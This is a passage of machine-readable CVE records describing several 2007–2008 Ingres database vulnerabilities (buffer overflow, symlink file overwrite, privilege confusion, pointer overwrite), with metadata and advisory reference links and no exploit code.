"refsource": "OSVDB",
"url": "http://osvdb.org/37487"
},
{
"name": "1018278",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018278"
},
{
"name": "ingres-data-access-server-bo(34992)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34992"
},
{
"name": "24585",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24585"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3334",
"datePublished": "2007-06-21T22:00:00.000Z",
"dateReserved": "2007-06-21T00:00:00.000Z",
"dateUpdated": "2024-08-07T14:14:12.912Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2008-3389 (GCVE-0-2008-3389)
Vulnerability from cvelistv5 – Published: 2008-08-05 19:20 – Updated: 2024-08-07 09:37- n/a
| URL | Tags |
|---|---|
| http://securitytracker.com/id?1020615 | vdb-entryx_refsource_SECTRACK |
| http://labs.idefense.com/intelligence/vulnerabili… | third-party-advisoryx_refsource_IDEFENSE |
| http://www.ingres.com/support/security-alert-080108.php | x_refsource_CONFIRM |
| http://www.vupen.com/english/advisories/2008/2292 | vdb-entryx_refsource_VUPEN |
| http://secunia.com/advisories/31398 | third-party-advisoryx_refsource_SECUNIA |
| http://www.vupen.com/english/advisories/2008/2313 | vdb-entryx_refsource_VUPEN |
| http://secunia.com/advisories/31357 | third-party-advisoryx_refsource_SECUNIA |
| https://exchange.xforce.ibmcloud.com/vulnerabilit… | vdb-entryx_refsource_XF |
| http://www.securityfocus.com/archive/1/495177/100… | mailing-listx_refsource_BUGTRAQ |
| http://www.securityfocus.com/bid/30512 | vdb-entryx_refsource_BID |
| https://support.ca.com/irj/portal/anonymous/phpsu… | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T09:37:26.380Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1020615",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1020615"
},
{
"name": "20080801 Ingres Database for Linux libbecompat Stack Based Buffer Overflow Vulnerability",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE",
"x_transferred"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"name": "ADV-2008-2292",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"name": "31398",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/31398"
},
{
"name": "ADV-2008-2313",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"name": "31357",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/31357"
},
{
"name": "ingres-libbecompat-bo(44179)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44179"
},
{
"name": "20080806 CA Products That Embed Ingres Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"name": "30512",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/30512"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2008-08-01T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in the libbecompat library in Ingres 2.6, Ingres 2006 release 1 (aka 9.0.4), and Ingres 2006 release 2 (aka 9.1.0) on Linux and HP-UX allows local users to gain privileges by setting a long value of an environment variable before running (1) verifydb, (2) iimerge, or (3) csreport."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-11T19:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "1020615",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1020615"
},
{
"name": "20080801 Ingres Database for Linux libbecompat Stack Based Buffer Overflow Vulnerability",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"name": "ADV-2008-2292",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"name": "31398",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/31398"
},
{
"name": "ADV-2008-2313",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"name": "31357",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/31357"
},
{
"name": "ingres-libbecompat-bo(44179)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44179"
},
{
"name": "20080806 CA Products That Embed Ingres Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"name": "30512",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/30512"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2008-3389",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in the libbecompat library in Ingres 2.6, Ingres 2006 release 1 (aka 9.0.4), and Ingres 2006 release 2 (aka 9.1.0) on Linux and HP-UX allows local users to gain privileges by setting a long value of an environment variable before running (1) verifydb, (2) iimerge, or (3) csreport."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1020615",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1020615"
},
{
"name": "20080801 Ingres Database for Linux libbecompat Stack Based Buffer Overflow Vulnerability",
"refsource": "IDEFENSE",
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732"
},
{
"name": "http://www.ingres.com/support/security-alert-080108.php",
"refsource": "CONFIRM",
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"name": "ADV-2008-2292",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"name": "31398",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/31398"
},
{
"name": "ADV-2008-2313",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"name": "31357",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/31357"
},
{
"name": "ingres-libbecompat-bo(44179)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44179"
},
{
"name": "20080806 CA Products That Embed Ingres Multiple Vulnerabilities",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"name": "30512",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/30512"
},
{
"name": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989",
"refsource": "CONFIRM",
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2008-3389",
"datePublished": "2008-08-05T19:20:00.000Z",
"dateReserved": "2008-07-30T00:00:00.000Z",
"dateUpdated": "2024-08-07T09:37:26.380Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2008-3356 (GCVE-0-2008-3356)
Vulnerability from cvelistv5 – Published: 2008-08-05 19:20 – Updated: 2024-08-07 09:37- n/a
| URL | Tags |
|---|---|
| http://www.ingres.com/support/security-alert-080108.php | x_refsource_CONFIRM |
| http://www.vupen.com/english/advisories/2008/2292 | vdb-entryx_refsource_VUPEN |
| http://secunia.com/advisories/31398 | third-party-advisoryx_refsource_SECUNIA |
| http://securitytracker.com/id?1020613 | vdb-entryx_refsource_SECTRACK |
| http://www.vupen.com/english/advisories/2008/2313 | vdb-entryx_refsource_VUPEN |
| http://secunia.com/advisories/31357 | third-party-advisoryx_refsource_SECUNIA |
| https://exchange.xforce.ibmcloud.com/vulnerabilit… | vdb-entryx_refsource_XF |
| http://www.securityfocus.com/archive/1/495177/100… | mailing-listx_refsource_BUGTRAQ |
| http://www.securityfocus.com/bid/30512 | vdb-entryx_refsource_BID |
| https://support.ca.com/irj/portal/anonymous/phpsu… | x_refsource_CONFIRM |
| http://labs.idefense.com/intelligence/vulnerabili… | third-party-advisoryx_refsource_IDEFENSE |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T09:37:26.794Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"name": "ADV-2008-2292",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"name": "31398",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/31398"
},
{
"name": "1020613",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1020613"
},
{
"name": "ADV-2008-2313",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"name": "31357",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/31357"
},
{
"name": "ingres-verifydb-symlink(44177)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44177"
},
{
"name": "20080806 CA Products That Embed Ingres Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"name": "30512",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/30512"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
},
{
"name": "20080801 Ingres Database for Linux verifydb Insecure File Permissions Modification Vulnerability",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE",
"x_transferred"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2008-08-01T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "verifydb in Ingres 2.6, Ingres 2006 release 1 (aka 9.0.4), and Ingres 2006 release 2 (aka 9.1.0) on Linux and other Unix platforms sets the ownership or permissions of an iivdb.log file without verifying that it is the application\u0027s own log file, which allows local users to overwrite arbitrary files by creating a symlink with an iivdb.log filename."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-11T19:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"name": "ADV-2008-2292",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"name": "31398",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/31398"
},
{
"name": "1020613",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1020613"
},
{
"name": "ADV-2008-2313",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"name": "31357",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/31357"
},
{
"name": "ingres-verifydb-symlink(44177)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44177"
},
{
"name": "20080806 CA Products That Embed Ingres Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"name": "30512",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/30512"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
},
{
"name": "20080801 Ingres Database for Linux verifydb Insecure File Permissions Modification Vulnerability",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2008-3356",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "verifydb in Ingres 2.6, Ingres 2006 release 1 (aka 9.0.4), and Ingres 2006 release 2 (aka 9.1.0) on Linux and other Unix platforms sets the ownership or permissions of an iivdb.log file without verifying that it is the application\u0027s own log file, which allows local users to overwrite arbitrary files by creating a symlink with an iivdb.log filename."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.ingres.com/support/security-alert-080108.php",
"refsource": "CONFIRM",
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"name": "ADV-2008-2292",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"name": "31398",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/31398"
},
{
"name": "1020613",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1020613"
},
{
"name": "ADV-2008-2313",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"name": "31357",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/31357"
},
{
"name": "ingres-verifydb-symlink(44177)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44177"
},
{
"name": "20080806 CA Products That Embed Ingres Multiple Vulnerabilities",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"name": "30512",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/30512"
},
{
"name": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989",
"refsource": "CONFIRM",
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
},
{
"name": "20080801 Ingres Database for Linux verifydb Insecure File Permissions Modification Vulnerability",
"refsource": "IDEFENSE",
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2008-3356",
"datePublished": "2008-08-05T19:20:00.000Z",
"dateReserved": "2008-07-28T00:00:00.000Z",
"dateUpdated": "2024-08-07T09:37:26.794Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-6334 (GCVE-0-2007-6334)
Vulnerability from cvelistv5 – Published: 2007-12-20 23:00 – Updated: 2024-08-07 16:02- n/a
| URL | Tags |
|---|---|
| http://www.vupen.com/english/advisories/2007/4303 | vdb-entryx_refsource_VUPEN |
| http://www.securitytracker.com/id?1019134 | vdb-entryx_refsource_SECTRACK |
| http://www.osvdb.org/39358 | vdb-entryx_refsource_OSVDB |
| http://www.ingres.com/support/security-alertDec17.php | x_refsource_CONFIRM |
| http://secunia.com/advisories/28187 | third-party-advisoryx_refsource_SECUNIA |
| http://www.securityfocus.com/bid/26959 | vdb-entryx_refsource_BID |
| http://secunia.com/advisories/28183 | third-party-advisoryx_refsource_SECUNIA |
| http://supportconnectw.ca.com/public/ingres/infod… | x_refsource_CONFIRM |
| http://www.vupen.com/english/advisories/2007/4304 | vdb-entryx_refsource_VUPEN |
| http://www.securityfocus.com/archive/1/485448/100… | mailing-listx_refsource_BUGTRAQ |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T16:02:36.365Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ADV-2007-4303",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/4303"
},
{
"name": "1019134",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1019134"
},
{
"name": "39358",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://www.osvdb.org/39358"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ingres.com/support/security-alertDec17.php"
},
{
"name": "28187",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/28187"
},
{
"name": "26959",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/26959"
},
{
"name": "28183",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/28183"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://supportconnectw.ca.com/public/ingres/infodocs/ingresmswin-secnot.asp"
},
{
"name": "ADV-2007-4304",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/4304"
},
{
"name": "20071221 [CAID 35970]: CA Products That Embed Ingres Authentication Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/485448/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-12-20T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Ingres 2.5 and 2.6 on Windows, as used in multiple CA products and possibly other products, assigns the privileges and identity of users to be the same as the first user, which allows remote attackers to gain privileges."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-15T20:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "ADV-2007-4303",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/4303"
},
{
"name": "1019134",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1019134"
},
{
"name": "39358",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://www.osvdb.org/39358"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ingres.com/support/security-alertDec17.php"
},
{
"name": "28187",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/28187"
},
{
"name": "26959",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/26959"
},
{
"name": "28183",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/28183"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://supportconnectw.ca.com/public/ingres/infodocs/ingresmswin-secnot.asp"
},
{
"name": "ADV-2007-4304",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/4304"
},
{
"name": "20071221 [CAID 35970]: CA Products That Embed Ingres Authentication Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/485448/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-6334",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Ingres 2.5 and 2.6 on Windows, as used in multiple CA products and possibly other products, assigns the privileges and identity of users to be the same as the first user, which allows remote attackers to gain privileges."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ADV-2007-4303",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/4303"
},
{
"name": "1019134",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1019134"
},
{
"name": "39358",
"refsource": "OSVDB",
"url": "http://www.osvdb.org/39358"
},
{
"name": "http://www.ingres.com/support/security-alertDec17.php",
"refsource": "CONFIRM",
"url": "http://www.ingres.com/support/security-alertDec17.php"
},
{
"name": "28187",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/28187"
},
{
"name": "26959",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/26959"
},
{
"name": "28183",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/28183"
},
{
"name": "http://supportconnectw.ca.com/public/ingres/infodocs/ingresmswin-secnot.asp",
"refsource": "CONFIRM",
"url": "http://supportconnectw.ca.com/public/ingres/infodocs/ingresmswin-secnot.asp"
},
{
"name": "ADV-2007-4304",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/4304"
},
{
"name": "20071221 [CAID 35970]: CA Products That Embed Ingres Authentication Vulnerability",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/485448/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-6334",
"datePublished": "2007-12-20T23:00:00.000Z",
"dateReserved": "2007-12-13T00:00:00.000Z",
"dateUpdated": "2024-08-07T16:02:36.365Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3336 (GCVE-0-2007-3336)
Vulnerability from cvelistv5 – Published: 2007-06-22 18:00 – Updated: 2024-08-07 14:14- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:14:12.898Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "ingres-unspecified-code-execution(34993)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
},
{
"name": "ingres-pointer-code-execution(35000)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24585"
},
{
"name": "37486",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37486"
},
{
"name": "20070625 Ingres Unauthenticated Pointer Overwrite 1",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
},
{
"name": "20070625 Ingres Unauthenticated Pointer Overwrite 2",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-06-22T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "ingres-unspecified-code-execution(34993)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
},
{
"name": "ingres-pointer-code-execution(35000)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
},
{
"name": "24585",
"tags": [
